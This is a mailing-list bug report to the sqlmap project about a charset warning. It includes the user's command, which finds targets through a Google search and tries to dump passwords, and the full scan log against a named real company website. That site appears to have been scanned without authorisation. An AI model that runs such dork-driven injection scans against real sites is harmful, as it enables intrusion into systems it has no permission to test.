[sqlmap-users] Reporting: Unknown web page charset
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Reporting: Unknown web page charset
|
From: Daniel D. <dan...@gm...> - 2015-05-23 19:34:19
|
*Reporting* [20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by e-mail to sql...@li.... *Command* sqlmap -g inurl:"showpro.asp?id=" --random-agent --batch --passwords *Terminal Readout* GET http://www.sh-sinap.com/en/Showpro.asp?id=6 do you want to test this URL? [Y/n/q] > Y [20:21:30] [INFO] testing URL 'http://www.sh-sinap.com/en/Showpro.asp?id=6' [20:21:40] [INFO] testing connection to the target URL [20:21:46] [INFO] testing if the target URL is stable. This can take a couple of seconds [20:21:50] [INFO] target URL is stable [20:21:50] [INFO] testing if GET parameter 'id' is dynamic [20:21:51] [WARNING] GET parameter 'id' does not appear dynamic [20:21:52] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable [20:21:52] [INFO] testing for SQL injection on GET parameter 'id' [20:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' *[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by e-mail to sql...@li... <sql...@li...>.* [20:21:53] [INFO] heuristics detected web page charset 'GB2312' [20:22:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [20:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [20:22:46] [INFO] testing 'MySQL inline queries' [20:22:47] [INFO] testing 'PostgreSQL inline queries' [20:22:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [20:22:53] [INFO] testing 'Oracle inline queries' [20:22:55] [INFO] testing 'SQLite inline queries' [20:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries' [20:22:56] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) [20:23:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [20:23:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [20:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [20:23:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' sqlmap got a 302 redirect to 'http://www.sh-sinap.com:80/en/Showpro.asp'. Do you want to follow? [Y/n] Y [20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [20:23:47] [INFO] testing 'Oracle AND time-based blind' [20:24:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [20:25:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [20:25:38] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' [20:27:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [20:27:45] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [20:28:16] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [20:28:47] [CRITICAL] connection timed out to the target URL or proxy [20:29:10] [WARNING] user aborted during detection phase how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] n [20:29:22] [WARNING] GET parameter 'id' is not injectable [20:29:22] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'), skipping to the next URL [20:29:22] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 15 times Regards Dan |
